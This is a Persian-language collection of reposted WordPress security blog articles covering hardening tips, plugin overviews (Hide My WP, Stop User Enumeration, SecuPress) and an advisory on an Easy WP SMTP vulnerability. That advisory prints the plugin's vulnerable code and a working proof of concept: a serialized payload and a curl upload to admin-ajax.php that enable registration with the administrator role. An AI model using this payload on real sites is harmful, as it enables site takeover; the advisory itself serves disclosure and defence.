دیجی اسکریپت

آموزش افزایش امنیت وردپرس در ۸ مرحله
[ad_1]

افزایش امنیت وردپرس مسئله‌ای است که به سادگی نمیتوان از کنار آن عبور کرد. با رشد بالا و محبوبیتی که وردپرس در طول این چند سال به خود گرفته است و از طرفی به دلیل متن باز و رایگان بودن باعث شده است تا همواره از روش‌های مختلف مورد حمله قرار گرفته و هکرها به دنبال این هستند که راهی برای نفوذ به وبسایت‌ها پیدا کنند. به همین دلیل بالا بردن امنیت وردپرس باعث می‌شود تا از صدمه دیدن به کسب و کار خود جلوگیری کنید.

 

در این آموزش به معرفی روش‌های مختلف افزایش امنیت وردپرس میپردازم که به کمک این روش‌های می توانید سایت خود را ایمن کنید. هر یک از روش های معرفی شده می‌تواند راه‌های مختلف نفوذ در وردپرس و هک وردپرس را محدود کرده و کار را برای هکر تا حدی که نتواند کاری انجام دهد دشوارتر کند.

 

آموزش افزایش امنیت وردپرس در ۸ مرحله

روش‌های معرفی شده در این مقاله به کمک افزونه و کدنویسی پیاده سازی می‌شوند. برخی از این روش‌ها با استفاده از هر دو قابلیت امکان پذیر است که به انتخاب خود می‌توانید از افزونه یا کدنویسی برای تامین امنیت وردپرس استفاده کنید.

 

استفاده از رمز عبور قوی

بعد از نسخه ۴ وردپرس قابلیتی در آن اضافه شد که انتخاب رمز شکل قوی‌تری به خود گرفت. در این نسخه انتخاب رمز بر عهده وردپرس قرار گرفت که از رمز عبور قوی متشکل از اعداد، کاکراکترهای خاص و حروف بزرگ و کوچک استفاده شده است. البته اینکه بخواهید از رمز دلخواه هم استفاده کنید فراهم است، اما پیشنهاد می‌شود از رمزی که وردپرس پیشنهاد می‌دهد استفاده کنید.

 

آپدیت مداوم وردپرس

در هر بار آپدیت وردپرس موارد امنیتی و قابلیت‌های جدیدی به آن اضافه می‌شود. افزونه‌ها و قالب‌های وردپرس نیز به همین شکل هستند که در هر بار آپدیت موارد امنیتی در آنها برطرف می‌شود. به عنوان نمونه در چند ماه گذشته افزونه داپلیکیتور که به عنوان یک افزونه پر استفاده برایساخت بسته‌های نصب آسان استفاده میشد، به دلیل عدم توجه افراد در غیرفعال سازی و حذف فایل‌های اضافی به دلیل وجود یک باگ باعث هک هزاران سایت وردپرسی شد.

 

بنابراین همواره باید تلاش کنید که از افزونه و قالب وردپرس به‌روز استفاده کنید. اگر هم می‌بینید که سازنده قالب دیگر پشتیبانی بابت آپدیت ارائه نمی‌کند در اولین فرصت ممکن قالب خود را تغییر دهید، چرا که هر چه دیرتر اقدام کنید ممکن است با یک باگ ساده کل سایت را نابود کنید.

 

بک آپ گیری همیشگی

در بیشتر موارد که سایت‌ها هک شده‌اند، به دلیل خرابی زیادی که به بار امده است امکان رفع مشکلات آن وجود ندارد. از طریفی مدت زمانی که برای رفع مشکلات طول میکشد زیاد شده و به همین دلیل با قرار دادن سایت در حالت تعمیر وردپرس روز به روز به سئو سایت شما آسیب زده میشود. بنابراین سریع‌ترین روش برای رفع مشکل هک وردپرس بازگردانی آخرین بک آپ است؛ البته منظور نسخه بک‌آپ سالم است.

 

پس سعی کنید به صورت مداوم و در بازه‌های زمانی هفتگی یا حتی روزانه از سایت خود نسخه پشتیبان تهیه کنید. اگر نگرانی بابت پهنای باند مصرفی اینترنت دارید می‌توانید این کار را با استفاده از VPS نیز انجام دهید. یا اینکه بک آپ گیری از دیتابیس وردپرس را به صورت روزانه و فایل‌ها را به صورت هفتگی انجام دهید.

 

افزایش امنیت صفحه ورود وردپرس

صفحه ورود وردپرس از مهم‌ترین صفحات یک سایت است که در بیشتر مواقع با ارسال درخواست ورود به سایت و حدس زدن نام کاربری و رمز عبور مورد حمله قرار می‌گیرد. این کار باعث می‌شود تا چندین نرم افزار به صورت مداوم برای ورود به سایت تلاش کنند، تعداد درخواست‌ها به حدی بالا می‌رود که در نهایت منجر به کاهش منابع هاست شده و سایت با اختلال مواجه می‌شود. در چنین شرایطی می توانید از روش‌های زیر استفاده کنید.

• تغییر آدرس صفحه ورود به وردپرس
• استفاده از قابلیت ورود دو مرحله‌ای در وردپرس
• استفاده از کپچا گوگل یا کپچا ریاضی وردپرس
• محدود کردن تعداد دفعات برای ورود به سایت و بلاک کردن آی‌پی
• بستن دسترسی به صفحه ورود و محدود کردن آن به یک آی‌پی خاص
• رمز گذاری روی پوشه wp-admin
• غیرفعال کردن پیغام خطا در صفحه ورود به وردپرس
• غیرفعال کردن ورود با ایمیل یا ورود با نام کاربری در وردپرس
• افزودن پرسش و پاسخ امنیتی برای صفحه ورود به وردپرس

برای هر یک از موارد فوق می‌توانید یک جستجوی ساده انجام داده و به کمک کد نویسی یا استفاده از افزونه هر یک از موارد فوق را پیاده سازی کنید.

 

استفاده از SSL

با استفاده از SSL می توان اطلاعاتی که بین کاربر و سایت رد و بدل می‌شود را کدگذاری کرد. به طوری که خواندن این اطلاعات تا زمانی که کلید خصوصی را نداشته باشید فراهم نیست. بنابراین استفاده از این روش در زمانی که کاربران در سایت عضو هستند و اطلاعات حساسی مثل رمز یا داده‌های شخصی را ارسال می‌کنند می‌تواند از مشکلات امنیتی جلوگیری کند.

 

تغییر پیشوند جداول وردپرس

اگر در هنگام نصب وردپرس پیشوند جداول را تغییر نداده و از همان حالت پیش فرض _wp استفاده می‌کنید بهتر است دست به کار شده و به کمک آموزش تغییر پیشوند جداول وردپرس اقدام به استفاده از پیشوند جدول دلخواه شوید. با استفاده از این روش می‌توان از درخواست‌های sql injection که به منظور دستکاری امنیتی دیتابیس مورد استفاده قرار می‌گیرد جلوگیری کرد.

 

غیرفعال کردن ویرایشگر قالب و افزونه

قابلیتی در منوی نمایش و افزونه‌ها با عنوان ویرایشگر وجود دارد که به کمک آن و بدون نیاز به اینکه وارد هاست شوید می‌توانید فایل افزونه‌ها و قالب را مشاهده کرده و کدهای ان را تغییر دهید. اگر دسترسی به نقش کاربری مدیر کل را برای فردی فراهم کنید یا اینکه رمز شما در اختیار فردی قرار گیرد، بدون اینکه متوجه شوید قادر است تا کدهایی را در فایل‌های وردپرس قرار داده و از سایت سوء استفاده کند.

// Disallow file edit
define( 'DISALLOW_FILE_EDIT', true );

برای غیرفعال کردن این قابلیت کافی است کد فوق را در فایل wp-config.php که در مسیر public_html قرار دارد ذخیره کنید.

 

غیرفعال کردن اجرای کدهای php

مطمئنا شما در هنگام استفاده از وردپرس نیازی به اجرای کدهای php نخواهید داشت. گاهی اوقات ممکن است که به دلیل داشتن دسترسی برخی افراد به وردپرس فایل‌های php در آن اپلود شود. از آنجایی که php زبان برنامه نویسی خود وردپرس است، با آپلود این فایل می‌توان هر کار مخربی را در وردپرس انجام داد. پس با قرار دادن کد زیر در فایل htaccess. هاست، از اجرای آنها جلوگیری کنید.

<Files *.php>
deny from all
</Files>

موفق باشید

نوشته آموزش افزایش امنیت وردپرس در ۸ مرحله اولین بار در بیست اسکریپت. پدیدار شد.

[ad_2]

لینک منبع مطلب

با بروز رسانی افزونه Easy WP SMTP، از خطر حمله به وردپرس دور بمانید
[ad_1]

به تازگی حملاتی به سایت‌های وردپرسی مشاهده شده که پس از تحقیق و بررسی‌های پیاپی مشکل کشف شد. این مشکلات از سمت افزونه Easy WP SMTP است که سایت وردپرسی را در معرض خطر حمله با تزریق کدهای مخرب در آن، قرار می‌دهد. اما چگونه از این خطر حمله به وردپرس دور بمانیم؟ پاسخ شما بسیار ساده است! با بروزرسانی افزونه Easy WP SMTP در وردپرس!
شاید بعضی از دوستان با این افزونه آشنا نباشند. “افزونه Easy WP SMTP امکان پیکربندی و ارسال ایمیل‌های خارجی از طریق یک سرور SMTP را می‌دهد. این امر باعث جلوگیری از ارسال ایمیل‌ها به پوشه‌های Junk یا Spam می‌شود. ”

 

خطر حمله به وردپرس

آسیب‌پذیری که در این افزونه یافت شد از ۱۵ مارس توسط هکرها مورد سوء استفاده قرار گرفت و توسط فایروال افزونه Ninjafirewall به دام افتاد. و نتایج زیر حاصل شد:

add_action( 'admin_init', array( $this, 'admin_init' ) );
...
...
function admin_init() {
    if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {
         add_action( 'wp_ajax_swpsmtp_clear_log', array( $this, 'clear_log' ) );
         add_action( 'wp_ajax_swpsmtp_self_destruct', array( $this, 'self_destruct_handler' ) );
    }
 
    //view log file
    if ( isset( $_GET[ 'swpsmtp_action' ] ) ) {
        if ( $_GET[ 'swpsmtp_action' ] === 'view_log' ) {
        $log_file_name = $this->opts[ 'smtp_settings' ][ 'log_file_name' ];
        if ( ! file_exists( plugin_dir_path( __FILE__ ) . $log_file_name ) ) {
            if ( $this->log( "Easy WP SMTP debug log filernrn" ) === false ) {
            wp_die( 'Can't write to log file. Check if plugin directory  (' . plugin_dir_path( __FILE__ ) . ') is writeable.' );
            };
        }
        $logfile = fopen( plugin_dir_path( __FILE__ ) . $log_file_name, 'rb' );
        if ( ! $logfile ) {
            wp_die( 'Can't open log file.' );
        }
        header( 'Content-Type: text/plain' );
        fpassthru( $logfile );
        die;
        }
    }
 
    //check if this is export settings request
    $is_export_settings = filter_input( INPUT_POST, 'swpsmtp_export_settings', FILTER_SANITIZE_NUMBER_INT );
    if ( $is_export_settings ) {
        $data                    = array();
        $opts                    = get_option( 'swpsmtp_options', array() );
        $data[ 'swpsmtp_options' ]       = $opts;
        $swpsmtp_pass_encrypted          = get_option( 'swpsmtp_pass_encrypted', false );
        $data[ 'swpsmtp_pass_encrypted' ]    = $swpsmtp_pass_encrypted;
        if ( $swpsmtp_pass_encrypted ) {
        $swpsmtp_enc_key         = get_option( 'swpsmtp_enc_key', false );
        $data[ 'swpsmtp_enc_key' ]   = $swpsmtp_enc_key;
        }
        $smtp_test_mail          = get_option( 'smtp_test_mail', array() );
        $data[ 'smtp_test_mail' ]    = $smtp_test_mail;
        $out                 = array();
        $out[ 'data' ]           = serialize( $data );
        $out[ 'ver' ]            = ۱;
        $out[ 'checksum' ]       = md5( $out[ 'data' ] );
 
        $filename = 'easy_wp_smtp_settings.txt';
        header( 'Content-Disposition: attachment; filename="' . $filename . '"' );
        header( 'Content-Type: text/plain' );
        echo serialize( $out );
        exit;
    }
 
    $is_import_settings = filter_input( INPUT_POST, 'swpsmtp_import_settings', FILTER_SANITIZE_NUMBER_INT );
    if ( $is_import_settings ) {
         $err_msg = __( 'Error occurred during settings import', 'easy-wp-smtp' );
         if ( empty( $_FILES[ 'swpsmtp_import_settings_file' ] ) ) {
            echo $err_msg;
            wp_die();
        }
        $in_raw = file_get_contents( $_FILES[ 'swpsmtp_import_settings_file' ][ 'tmp_name' ] );
        try {
            $in = unserialize( $in_raw );
            if ( empty( $in[ 'data' ] ) ) {
                 echo $err_msg;
                 wp_die();
            }
            if ( empty( $in[ 'checksum' ] ) ) {
                 echo $err_msg;
                 wp_die();
            }
            if ( md5( $in[ 'data' ] ) !== $in[ 'checksum' ] ) {
                 echo $err_msg;
                 wp_die();
            }
            $data = unserialize( $in[ 'data' ] );
            foreach ( $data as $key => $value ) {
                 update_option( $key, $value );
            }
            set_transient( 'easy_wp_smtp_settings_import_success', true, 60 * 60 );
            $url = admin_url() . 'options-general.php?page=swpsmtp_settings';
            wp_safe_redirect( $url );
            exit;
        } catch ( Exception $ex ) {
            echo $err_msg;
            wp_die();
        }
    }
}

دستور ()admin_init در قطعه کد بالا که از اسکریپت افزونه است، زمانی که کاربر به پیشخوان مدیریت دسترسی دارد، توسط admin_init اجرا می‌شود. این مورد باید با درون‌ریزی یا برون‌بری در پیکربندی افزونه و بروز رسانی تنظیمات آن در پایگاه داده مشاهده و حذف شود. این قابلیت سطح دسترسی کاربر را بررسی نمی‌کند، از این رو هر کاربر وارد شده می‌تواند به عنوان یک مشترک باشد. اما این مورد می‌تواند عملیاتی را برای انجام توسط کاربران غیرمجاز و نامعتبر اجرا کند و همین موضوع خطر حمله به وردپرس را دامن می‌زند. زیرا افزونه Easy WP SMTP ممکن است بصورت ایجکسی و در admin_init اجرا شود. این موضوع اینگونه در  WordPress API توصیف شده است:

• توجه داشته باشید، این مشکل فقط بر روی نمایشگرهای مدیریت شده کاربر اجرا نشده بلکه بر روی admin-post.php و admin-ajax.php نیز ظاهر خواهد شد.

بنابراین، کاربران غیرمجاز توانایی ارسال درخواست‌های ایجکسی مانند action=swpsmtp_clear_log را برای اجرای عملکرد بالا دارند. همین امر خطر حمله به وردپرس را به وجود می‌آورد.

اثبات این مفهوم

برای اثبات مفهومی که در این محتوا در مورد آن صحبت می‌کنیم، از swpsmtp_import_settings برای بارگذاری فایل‌هایی که حاوی سریال‌های مخرب هستند و باعث فعال شدن ثبت‌نام کاربران می‌شوند استفاده کردیم. همچنین نقش کاربر را بصورت پیش‌فرض “مدیر” در پایگاه داده قرار دادیم.

۱- فایلی با عنوان  “tmp/upload.txt/” ایجاد کنید و اطلاعات زیر را در آن وارد نمایید:

a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

۲- فایل زیر را بارگذاری کنید:

$ curl https://VICTIM.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'

سایر دلایل خطر حمله به وردپرس

آسیب‌های دیگر نیز هستند که میزان خطر حمله به وردپرس را افزایش داده و مورد سوء استفاده افراد مخرب قرار می‌گیرند که عبارت است از:

• اجرای کدهایی که درون آن‌ها کدهای مخرب php تزریق شده زیرا افزونه Easy WP SMTP از یک تابع نا ایمن به نام ()unserialize استفاده می‌کند.
• مشاهده و حذف لاگ‌ها (یا هر نوع فایلی، زیرا هکرها می‌توانند نام فایل را تغییر دهند.)
• خروجی گرفتن از افزونه که شامل اطلاعات سرور SMTP، نام کاربری، رمز عبور و استفاده از آن برای ارسال ایمیل‌های اسپم است.

نکته جالب اینجاست که هکرها از این آسیب‌پذیری برای تغییر محتوا و داده‌های وردپرس مانند جدول wp_user_roles در پایگاه داده و توانایی دسترسی مدیر به تمامی کاربران، استفاده می‌کنند. متاسفانه تغییر اکانت مدیر به راحتی در بخش کاربری شناسایی می‌شود. جالب‌تر اینجاست که تشخیص این تغییرات کار بسیار سختی است زیرا اکانت کاربری یک مدیر دقیقا مانند یک کاربر مشترک است فقط در بک‌گراند کار مشخص می‌شود که سطح دسترسی آن بسیار گسترده است.

 

توصیه‌های مهم

اولین و مهم‌ترین توصیه‌ای که برایتان داریم این است که با شتاب هر چه بیشتر افزونه Easy WP SMTP را در جهت حفظ امنیت وردپرس، بروزرسانی کنید. سپس به موارد زیر توجه کنید:

• به قسمت تنظیمات>> عمومی مراجعه کنید و بررسی کنید که هیچ گزینه‌ای غیر عادی نیست و دست‌کاری نشده است. مواردی از قبیل آدرس سایت، آدرس ایمیل، نقش‌های کاربری و…
• صفحه کاربران وردپرس را حتما چک کنید، کاربران جدید را بررسی کنید، حساب‌های کاربری غریبه را پیگیری کرده و حذف کنید. همچنین ایمیل مدیریت را نیز بررسی کنید که تغییری نکرده باشد.
• برای در امان بودن از خطر حمله به وردپرس، تمامی پسوردها را تغییر دهید. (انتخاب پسورد قوی)
• جدول wp_options را در پایگاه داده وردپرس مورد بررسی قرار دهید و در مورد نقش‌های کاربری در wp_user_roles اطمینان حاصل کنید.
• فایل‌های سایت خود اسکن کنید زیرا هکرها ممکن است فایل‌هایی مخرب را در سایت شما ایجاد کنند. (اسکن وردپرسی)
• پسورد SMTP خود را تغییر دهید زیرا ممکن است هکرها آن را کشف کرده باشند.

نوشته با بروز رسانی افزونه Easy WP SMTP، از خطر حمله به وردپرس دور بمانید اولین بار در بیست اسکریپت. پدیدار شد.

[ad_2]

لینک منبع مطلب

سطح دسترسی چیست؟ تغییر سطح دسترسی یا پرمیشن فایل‌ها در وردپرس
[ad_1]

[ad_2]

لینک منبع مطلب

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶٫۱
[ad_1]

وردپرس با وجود آنکه سیستم بسیار قدرتمند و محبوبی است ، اما گاهی مورد نفوذ برخی افراد قرار می گیرد که این امری ناخوشایند است . یکی از مشکلاتی که وبمستران وردپرسی با آن همراه هستند ، فهمیدن استفاده آنها از وردپرس توسط هکران و سایر کاربران می باشد . در این مطلب قصد داریم به شما افزونه ای را معرفی کنیم که توسط آن قادر به مخفی سازی بخش هایی از وروپرس که کاربران را قادر به فهمیدن استفاده شما از وردپرس می سازد ،خواهید بود .

Hide My WP نام یک افزونه فوق العاده در زمینه تغییر و مخفی سازی وردپرس می باشد. این افزونه کاربردی قادر است تمامی اطلاعاتی که نمایانگر استفاده شما از سیستم وردپرس می باشد را از دید کاربران مخفی کند. این افزونه تمامی لینک های مطالب ، برگه ها ، فایل های آپلود شده ، لینک فایل های CSS و Javascript قالب ها و… را به آدرس دلخواه تغییر دهد. به قابلیت های کلی این افزونه اشاره می کنیم

برخی از امکانات افزونه مخفی سازی وردپرس Hide My WP :

• تغییر دایرکتوری تم وردپرس، حذف اطلاعات موضوع از شیوه، جایگزین کلاس های پیش فرض WP و در نهایت آن را کوچک کردن!
• تغییر دایرکتوری پلاگین ها و هش نام پلاگین ها
• تغییر بارگذاری لینک آپلود-شامل پوشه، wp-includes لینک آزاکس و غیره
• تغییر لینک نمایش وردپرس
• تغییر پیوند همیشگی نویسنده (و یا غیر فعال کردن آن!)
• تغییر و یا غیر فعال کردن فید
• مخفی کردن همه فایل های وردپرس و دیگر فایل ها!
• غیر فعال کردن آرشیو وردپرس، دسته ها، برچسب ها، صفحات، پست، و غیره
• به راحتی هر یک از عبارات جایگزین را در فایل خروجی HTML سایت خود بگذارید!
• اطلاع دادن به شما درباره سایت وردپرس خودتان (همراه با جزئیات بازدید کننده مانند IP، عامل کاربر، ارجاع و حتی نام کاربری!)
• فشرده سازی خروجی HTML و حذف نظرات در کد منبع
• حذف متا اطلاعات وردپرس از هدر و خوراک
• تغییر ایمیل پیش فرض وردپرس
• صفحه سفارشی ۴۰۴!
• حذف کلاس های منو های غیر ضروری
• پاک کردن کلاس های بادی
• و..

نوشته افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶٫۱ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.

[ad_2]

لینک منبع مطلب

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها
[ad_1]

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها

در این آموزش، در ابتدا اول شما را با عبارت Enumeration آشنا میکنم. فرآیند استخراج نام کاربری، نام سیستم ها، منابع شبکه و سرویس ها از یک سیستم را Enumeration گویند. در مرحله Enumeration هکر کانکشن های فعال به سیستم برقرار میکند و درخواست های مستقیم برای بدست اوردن اطلاعات بیشتر درباره هدف ارسال میکند.

به طور کلی این فرایند نام های کاربری و میزبان، سرویس های شبکه، جزئیات SNMP و اطلاعات را جمع آوری میکنند. روشهای بسیاری مانند SMTP Enumeration، DNS Enumeration وجود دارد که هکرها میتواند سیستم و یا شبکه هدف را Enumerate کند.

حال نوبت معرفی افزونه امنیتی Stop User Enumeration است که می توانید مانع شوید هکرها نام های کاربری وردپرس شما را اسکن یا شمارش کنند. شمارش کاربر یک نوع حمله است که هکرها میتوانند وبسایت شما را شناسایی و نام کاربری تان را کشف کنند.

این افزونه، کمک می کند این حملات مسدود شوند و حتی اجازه می دهد تا وارد این حملات شوید و حملات بیشتر را در آینده مسدود کنید.

اگر شما روی یک سرور VPS یا سرور اختصاصی هستید، به عنوان حمله IP وارد شده است، شما می توانید از fail2ban برای جلوگیری از حمله به طور مستقیم در فایروال سرور خود، یک راه بسیار قدرتمند برای صاحبان VPS برای جلوگیری از حملات خشونت آمیز به عنوان حملات DDoS استفاده کنید.

نحوه کار با افزونه Stop User Enumeration

مانند همیشه افزونه را نصب و فعالسازی کنید، پس از فعالسازی افزونه منو جدیدی به نام Stop User Enumeration به بخش تنظیمات پنل مدیریت وردپرس اضافه می شود.

وارد صفحه افزونه شوید، در تب Settings سه گزینه وجود دارد:

• گزینه اول مربوط به فراخوانی API می باشد. در وردپرس همه میتوانند کاربران را با فراخوانی API پیدا کنند. با فعال کردن این گزینه، فراخوانی محدود میشود تنها به کاربرانی که وارد شده اند.
• گزینه دوم را در صورتی فعال کنید که از fail2ban در VPS خود استفاده می کنید.
• با فعال کردن گزینه سوم، این افزونه از jQuery برای حذف هر عدد از نام نویسنده دیدگاه استفاده میکند ، به این دلیل است که حمله(Enumeration )، اعداد را کنترل و بررسی می کند.

سه گزینه را فعال و روی دکمه ذخیره تغییرات کلیک کنید.

نوشته جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.

[ad_2]

لینک منبع مطلب

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها
[ad_1]

جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها

در این آموزش، در ابتدا اول شما را با عبارت Enumeration آشنا میکنم. فرآیند استخراج نام کاربری، نام سیستم ها، منابع شبکه و سرویس ها از یک سیستم را Enumeration گویند. در مرحله Enumeration هکر کانکشن های فعال به سیستم برقرار میکند و درخواست های مستقیم برای بدست اوردن اطلاعات بیشتر درباره هدف ارسال میکند.

 

 

به طور کلی این فرایند نام های کاربری و میزبان، سرویس های شبکه، جزئیات SNMP و اطلاعات را جمع آوری میکنند. روشهای بسیاری مانند SMTP Enumeration، DNS Enumeration وجود دارد که هکرها میتواند سیستم و یا شبکه هدف را Enumerate کند.

 

حال نوبت معرفی افزونه امنیتی Stop User Enumeration است که می توانید مانع شوید هکرها نام های کاربری وردپرس شما را اسکن یا شمارش کنند. شمارش کاربر یک نوع حمله است که هکرها میتوانند وبسایت شما را شناسایی و نام کاربری تان را کشف کنند.

 

این افزونه، کمک می کند این حملات مسدود شوند و حتی اجازه می دهد تا وارد این حملات شوید و حملات بیشتر را در آینده مسدود کنید.

اگر شما روی یک سرور VPS یا سرور اختصاصی هستید، به عنوان حمله IP وارد شده است، شما می توانید از fail2ban برای جلوگیری از حمله به طور مستقیم در فایروال سرور خود، یک راه بسیار قدرتمند برای صاحبان VPS برای جلوگیری از حملات خشونت آمیز به عنوان حملات DDoS استفاده کنید.

 

نحوه کار با افزونه Stop User Enumeration

مانند همیشه افزونه را نصب و فعالسازی کنید، پس از فعالسازی افزونه منو جدیدی به نام  Stop User Enumeration به بخش تنظیمات پنل مدیریت وردپرس اضافه می شود.

وارد صفحه افزونه شوید، در تب Settings سه گزینه وجود دارد:

• گزینه اول مربوط به فراخوانی API می باشد. در وردپرس همه میتوانند کاربران را با فراخوانی API پیدا کنند. با فعال کردن این گزینه، فراخوانی محدود میشود تنها به کاربرانی که وارد شده اند.
• گزینه دوم را در صورتی فعال کنید که از fail2ban در VPS خود استفاده می کنید.
• با فعال کردن گزینه سوم، این افزونه از jQuery برای حذف هر عدد از نام نویسنده دیدگاه استفاده میکند ، به این دلیل است که حمله(Enumeration )، اعداد را کنترل و بررسی می کند.

سه گزینه را فعال و روی دکمه ذخیره تغییرات کلیک کنید.

نوشته جلوگیری از جمع آوری نام کاربری وردپرس توسط هکرها اولین بار در بیست اسکریپت. پدیدار شد.

[ad_2]

لینک منبع مطلب

افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶
[ad_1]

وردپرس با وجود آنکه سیستم بسیار قدرتمند و محبوبی است ، اما گاهی مورد نفوذ برخی افراد قرار می گیرد که این امری ناخوشایند است . یکی از مشکلاتی که وبمستران وردپرسی با آن همراه هستند ، فهمیدن استفاده آنها از وردپرس توسط هکران و سایر کاربران می باشد . در این مطلب قصد داریم به شما افزونه ای را معرفی کنیم که توسط آن قادر به مخفی سازی بخش هایی از وروپرس که کاربران را قادر به فهمیدن استفاده شما از وردپرس می سازد ،خواهید بود .

Hide My WP نام یک افزونه فوق العاده در زمینه تغییر و مخفی سازی وردپرس می باشد. این افزونه کاربردی قادر است تمامی اطلاعاتی که نمایانگر استفاده شما از سیستم وردپرس می باشد را از دید کاربران مخفی کند. این افزونه تمامی لینک های مطالب ، برگه ها ، فایل های آپلود شده ، لینک فایل های CSS و Javascript قالب ها و… را به آدرس دلخواه تغییر دهد. به قابلیت های کلی این افزونه اشاره می کنیم

برخی از امکانات افزونه مخفی سازی وردپرس Hide My WP :

• تغییر دایرکتوری تم وردپرس، حذف اطلاعات موضوع از شیوه، جایگزین کلاس های پیش فرض WP و در نهایت آن را کوچک کردن!
• تغییر دایرکتوری پلاگین ها و هش نام پلاگین ها
• تغییر بارگذاری لینک آپلود-شامل پوشه، wp-includes لینک آزاکس و غیره
• تغییر لینک نمایش وردپرس
• تغییر پیوند همیشگی نویسنده (و یا غیر فعال کردن آن!)
• تغییر و یا غیر فعال کردن فید
• مخفی کردن همه فایل های وردپرس و دیگر فایل ها!
• غیر فعال کردن آرشیو وردپرس، دسته ها، برچسب ها، صفحات، پست، و غیره
• به راحتی هر یک از عبارات جایگزین را در فایل خروجی HTML سایت خود بگذارید!
• اطلاع دادن به شما درباره سایت وردپرس خودتان (همراه با جزئیات بازدید کننده مانند IP، عامل کاربر، ارجاع و حتی نام کاربری!)
• فشرده سازی خروجی HTML و حذف نظرات در کد منبع
• حذف متا اطلاعات وردپرس از هدر و خوراک
• تغییر ایمیل پیش فرض وردپرس
• صفحه سفارشی ۴۰۴!
• حذف کلاس های منو های غیر ضروری
• پاک کردن کلاس های بادی
• و..

نوشته افزونه امنیتی مخفی سازی وردپرس با Hide My WP نسخه ۵٫۶ اولین بار در دلکد – دانلود اسکریپت. پدیدار شد.

[ad_2]

لینک منبع مطلب

محافظت از وردپرس با افزونه Secupress
[ad_1]

شاید اوایل راه‌اندازی سایتتان خیلی به فکر تامین امنیت آن نباشید؛ اما با گذر زمان و پیشرفت، قطعا امنیت از ارکان اصلی مدیریت وبسایت خواهد شد. چرا که زحمات چندین ساله شما و تیم‌تان ممکن است در کسری از ثانیه از بین برود! خطر همیشه در کمین است.

 

توسعه دهنده‌های وردپرس از سراسر جهان روی راهکارهای محافظت از وردپرس کار می‌کنند که آن هم مدیون متن باز بودن وردپرس هستند. حدود ۳۰ درصد وبسایت‌های موجود با وردپرس ساخته شده‌اند و امنیت آن قطعا برای هر کدام از این سایت‌ها حائز اهمیت است. با آموزش وردپرس امروز همراه ما باشید تا با یک روش عالی ایمنی سایت آشنا شوید.

 

محافظت از وردپرس

چند روز پیش یک افزونه حرفه‌ای برای تامین امنیت وردپرس iTheme Security معرفی کردیم که در دو نسخه رایگان و حرفه‌ای موجود است. امروز نیز می‌خواهیم یکی دیگر از افزونه‌های مطلوب امنیتی با عنوان Secupress را در محافظت از وردپرس بررسی کنیم. امیدوارم همان‌قدر که ما بر امنیت تاکید می‌کنیم، شما هم حواستان به آن باشد.

 

امنیت وردپرس با افزونه Secupress

افزونه Secupress را به لحاظ امکانات زیادی که دارد، می توان در دسته افزونه‌های امنیتی جهت محافظت از وردپرس جای داد. افزونه امنیتی Secupress برای تامین امنیت وردپرس راهکارهای جالبی ارائه می‌دهد. گرافیک جذاب این افزونه در کنار عملکرد خوبش، آن را جزو یکی از محبوب‌ترین افزونه‌های امنیتی وردپرس قرار داده. این افزونه با بیش از ۱۰۰۰۰ نصب فعال توانسته ۴٫۵ ستاره در مخزن وردپرس را از آن خود کند.

ویژگی‌های این افزونه

• دارای فایروال
• عدم اجازه دسترسی به سایت برای کاربرانی با موقعیت جغرافیایی خاص
• بلاک کردن IP های مشکوک
• تشخیص قالب‌ها و افزونه‌های آسیب‌پذیر
• ارائه گزارش امنیتی در قالب PDF
• بلاک کردن ربات‌های مخرب
• عدم اجازه دسترسی به خزنده‌های مخرب
• و …

این افزونه دارای دو نسخه رایگان و پرمیوم است که در نسخه پولی می‌توانید از قابلیت انجام خودکار وظیفه‌ها توسط خود افزونه استفاده کنید. نسخه رایگان هم امکانات خوبی را به همراه دارد.

 

نصب و راه‌اندازی افزونه Secupress

بسیار خوب! اگر موافق باشید افزونه را نصب کنیم. افزونه را از انتهای همین آموزش دریافت کرده و آن را در مسیر افزونه‌ها نصب و فعال نمایید.
پس از نصب و فعال شدن افزونه، بنری در بالای صفحه ظاهر می‌شود که مربوط به اسکن امنیتی سایت است. ما این کار را پس از پیکربندی افزونه انجام خواهیم داد. فعلا روی دکمه ضربدر روی بنر کلیک کنید.

در سمت راست پیشخوان وردپرس، منوی SecuPress اضافه خواهد شد که تنظیمات افزونه را می توان از این بخش تغییر داد و امکان محافظت از وردپرس را با همین گزینه‌ها فراهم کرد.

منوی افزونه شامل ۳ بخش است:

• Scanners: از این بخش می‌توانید سایت خود را از لحاظ امنیتی اسکن کرده و براساس رتبه امنیت سایتتان، درجه A تا D را دریافت کنید.
• Mosules: تنظیمات افزونه از این بخش در دسترس هستند.
• More Security: این گزینه برای خرید دلاری نسخه پولی این افزونه است که عملا برای ما کاربردی ندارد.

 

پیکربندی افزونه

برای پیکربندی افزونه روی گزینه Modules کلیک کنید. در صفحه باز شده سربرگ‌های مختلفی وجود دارند که به شرح هر کدام می‌پردازیم:

تذکر: دقت کنید که از ذکر بخش‌هایی که مخصوص نسخه پرمیوم هستند چشم پوشی شده است.

 

سربرگ Dashboard

سربرگ اول Dashboard است که عملا کار خاصی با اینجا نداریم؛ زیرا امکاناتی مثل خروجی گرفتن از تنظیمات افزونه و … در نسخه پرمیوم در دسترس هستند. اما در آخر صفحه می‌توانید در صورت نیاز، تنظیمات افزونه را به حالت اولیه برگردانید. در واقع امکان ریست کردن برایتان فراهم است.

سربرگ Users & Login

در این بخش می‌توانید انواع تنظیمات مربوط به ورود به سایت را مشاهده نمایید.

